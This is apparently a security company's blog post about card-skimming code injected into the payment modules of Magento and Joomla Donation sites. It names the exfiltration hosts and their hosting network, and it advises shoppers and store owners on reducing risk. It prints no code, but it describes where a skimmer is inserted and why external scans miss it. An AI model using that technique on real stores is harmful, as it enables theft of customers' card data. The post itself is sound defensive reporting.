Recently we wrote about the impacts of a hacked website and how it is important to give website visitors a safe online experience. In this post, I’ll show you how a hacked website results in almost immediate loss of money.
We’re not talking about drive-by infections that can be prevented by using a good antivirus, updated software, and extensions like NoScript. We’re also not talking about phishing pages, where you can recognize the scam and choose not to enter your credentials on a fake website. This time, we’re talking about using legitimate sites that have absolutely no externally visible signs of compromise.
Stolen Credit Card Details
One of our clients who owns an ecommerce site asked us to investigate why he was getting complaints from customers about unauthorized credit card transactions:
We received 2 messages from customers today indicating that after making a purchase on our site, they were hit with multiple fraudulent charges on their credit card.
We scanned their Magento site and found malicious code inside the app/code/core/Mage/Payment/Model/Method/Cc.php file:
Inside the prepareSave() function, hackers added 50 extra lines of code that were designed to send all the information submitted by a customer during the checkout process to a third-party site: “soulmagic .biz .fozzyhost .com/add“.
As with most Magento sites, this site had a checkout form that requests customers’ credit card details. Behind the scenes, Magento encrypts this data and saves it or sends it to a payment gateway to complete the transaction. We won’t discuss how secure this practice is. Instead, we’ll focus on the moment between the checkout form submission and encryption of the payment details. This is a very short period of time when Magento handles sensitive customer information in an unencrypted format. This is all fine – unless the site is compromised and hackers patched the code that works with the unencrypted information.
A quick search revealed that other Magento sites also had been hit by this attack, with the earliest known incidents going back to December of 2013. Back then, the thieves used the “java-e-shop .com/add” URL to dump stolen payment details. We also found a very similar code that sends credit card information to java-e-shop .com being injected into the components/com_jdonation/payments/os_authnet.php file in the Joomla Donation extension in Joomla sites.
Both these sites are hosted on the Webazilla/Fozzy.com network:
- soulmagic .biz .fozzyhost .com 126.96.36.199 – Cyprus, Limassol -Webazilla B.v.
- java-e-shop .com 188.8.131.52 – United States, Wilmington -Webazilla B.v.
Magento and JoomDonation are not the only web applications targeted by credit card thieves. All ecommerce solutions (CMS, plugin, extension, etc) are equally susceptible to this kind of attack if they allow customers to enter their credit card details directly on a site (instead of redirecting them to a payment gateway site to complete transactions). It’s so easy for attackers to add a little patch in the legitimate code that will dump customer details to a malicious third-party.
Customers of online stores are not the only target either. When hackers manage to compromise an ecommerce site, the owners of the website can be robbed too. We have seen cases where hackers replace the website owner’s PayPal account in the site payment module with their own account. When customers would buy something, the website owner would never receive the funds.
To Online Shoppers
These kinds of hacks make using ecommerce websites quite risky. You can never tell whether it is really secure to enter your credit card details on a site or not.
Security badges and HTTPS with a trusted certificate don’t actually provide any guarantee that the payment module is not “patched”. External scans simply can’t detect this. HTTPS encrypts traffic only between your browser and the site’s server, once the site receives your data it is not encrypted again. Only after you have paid you may find out the site was not secure — fraudulent charges on your card statement will be your clue. Again, this doesn’t happen immediately. It may take hours, days, or even months before the criminals decide to use your stolen credit card details, and if you use that card quite often, it would be hard to tell which online store leaked your data if it even was from online shopping at all.
You can still minimize risk when shopping online:
- Shy away from sites that require entering payment details on their own page. Instead prefer the websites that send you to a payment organization (PayPal, payment gateway, bank, etc) to complete the purchase. These payment organizations are required to have very strict security policies on their websites, with regular assessments, so they are less likely to be hacked or miss some unauthorized modifications in their backend code.
- Check if the website has or recently had some security issue. If hackers have already broken into that site previously, they could have patched the payment module. The modification might be overlooked and survive a cleanup.
- You may find such information if you scan a site with our free SiteCheck tool. It searches for malware and checks sites against 10 different blacklists.
- You can also check Google’s SafeBrowsing information for the site: http://www.google.com/safebrowsing/diagnostic?site=example.com (replace example.com with the domain name of the site). The diagnostic pages contain historical information for the last 90 days.
- You can also search the internet to see whether the website had any security issues recently. Use the domain name along with keywords like “security”, “hacked”, “malware”, “fraud”, etc.
- Only use credit cards with additional levels of authentication. E.g. Visa 3-D Secure, or MasterCard SecureCode, or your bank’s own 2FA service. Of course, this is not bulletproof protection as hackers may use the credit card details in places that don’t support these additional security layers (think most offline transactions).
To Owners of Ecommerce Sites
Adapting a well-known quote:
With websites comes responsibility. With ecommerce websites comes great responsibility.
Let’s check what the official payment card industry has to says about this:
Small merchants are prime targets for data thieves. It’s your job to protect cardholder data at the point of sale.
If cardholder data is stolen – and it’s your fault – you could incur fines, penalties, even termination of the right to accept payment cards!
You can find more information about it in our series of blog posts about PCI compliance and e-commerce sites.
Here are some basic suggestions to small ecommerce sites:
- Stay away from processing payment details on your site. If your site never has access to clients’ payment details, it can’t be used to steal them even if it is hacked. Just outsource payments to some trusted third-party service as PayPal, Stripe, Google Wallet, Authorize.net, etc.
- Think security from the very beginning. You need to be proactive. If your site is hacked then you need to get help quickly. You can’t risk your customers’ money and your reputation.
- Use best practices with your website security:
- Use strong and unique passwords for every element of your site: hosting, CMS, payment services, etc.
- Have some integrity control of files and the database. This will help you detect unauthorized modifications. Our WordPress security plugin offers integrity monitoring.
- Don’t host your e-commerce site on the same hosting account with other sites. The better the isolation from the rest sites, the fewer chances one of the less secure neighbor sites will be the point of penetration for your important ecommerce site.
- Use a website firewall — it will protect your sites from many web-based attacks. Ideally, the firewall should be actively maintained and updated so that no new types of attacks could bypass it.
- Monitor your website for security issues, both on the client-facing frontend, and the server-side backend.
Update: Read our new PCI Compliance guide.